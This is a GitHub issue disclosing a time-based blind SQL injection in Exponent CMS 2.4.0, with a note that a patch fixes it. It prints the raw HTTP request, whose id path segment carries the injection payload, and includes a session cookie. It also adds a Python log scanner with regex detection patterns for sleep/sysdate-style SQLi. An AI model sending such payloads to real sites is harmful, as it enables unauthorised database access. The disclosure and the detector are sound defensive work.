exponentcms / exponent-cms

Content Management, Simple.
exponentcms.org
GNU General Public License v2.0

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (3) #1436

Closed exponentcms closed 4 years ago

exponentcms commented 4 years ago

GET /exponent/text/delete/id/if(now()%3dsysdate()%2csleep(0)%2c0)/'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22//src/@footer HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=e965beb8dc3e7046008f7d832de5b554; adminer_key=cdeaea5d52a8f402a28bd04980a7851b
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
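Detection logic for this class of request, as an added example that is not part of the report or of the Exponent CMS code base: it URL-decodes request paths from constructed access-log lines, checks that the `id` segment of the `/text/delete/id/...` route is a plain integer, and flags the time-based patterns (`sleep(`, `now()=sysdate()`, `XOR(`/`OR(`) used in the request above. The combined log format, the benign requests and the client addresses are assumptions.

```python
import re
from urllib.parse import unquote

# Markers of time-based blind SQL injection, modelled on the reported payload
# if(now()=sysdate(),sleep(0),0) wrapped in XOR(...) / OR(...).
TIME_BASED_PATTERNS = [
    re.compile(r"\bsleep\s*\(", re.I),
    re.compile(r"\bbenchmark\s*\(", re.I),
    re.compile(r"now\(\)\s*=\s*sysdate\(\)", re.I),
    re.compile(r"\b(?:xor|or|and)\s*\(", re.I),
]

# Route from the report: /exponent/<module>/delete/id/<id>/...
ID_ROUTE = re.compile(r"^/exponent/[a-z_]+/delete/id/([^/]+)", re.I)


def is_valid_id(value: str) -> bool:
    """A record id on this route should be nothing but decimal digits."""
    return value.isdigit()


def inspect_request_path(path: str) -> dict:
    """Decode one request path and report why (if at all) it looks injected."""
    decoded = unquote(path)  # one decode pass; the reported payload is single-encoded
    hits = [p.pattern for p in TIME_BASED_PATTERNS if p.search(decoded)]
    m = ID_ROUTE.match(decoded)
    bad_id = bool(m) and not is_valid_id(m.group(1))
    return {"decoded": decoded, "patterns": hits, "bad_id": bad_id,
            "suspicious": bool(hits) or bad_id}


def scan_access_log(lines):
    """Return (raw_path, finding) for every log line that looks suspicious."""
    flagged = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        finding = inspect_request_path(m.group(1))
        if finding["suspicious"]:
            flagged.append((m.group(1), finding))
    return flagged


# Constructed sample log lines (combined log format, dates invented); the second
# path is the one from the report, the other two are benign.
SAMPLE_LOG = [
    '192.168.118.1 - - [01/Jan/2020:10:00:01 +0000] "GET /exponent/text/delete/id/42/src/@footer HTTP/1.1" 200 512',
    '192.168.118.1 - - [01/Jan/2020:10:00:02 +0000] "GET /exponent/text/delete/id/if(now()%3dsysdate()%2csleep(0)%2c0)/\'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR\'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22//src/@footer HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2020:10:00:03 +0000] "GET /exponent/index.php?section=1 HTTP/1.1" 200 2048',
]
```

The same `is_valid_id` check, applied before the id reaches any query, is the input-validation half of the fix; the scanner shows what the unpatched route was accepting.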

exponentcms commented 4 years ago

This should be fixed in 2.4.0patch1 released Nov 4th

exponentcms commented 4 years ago

Lighthouse URL: https://exponentcms.lighthouseapp.com/projects/61783/tickets/1393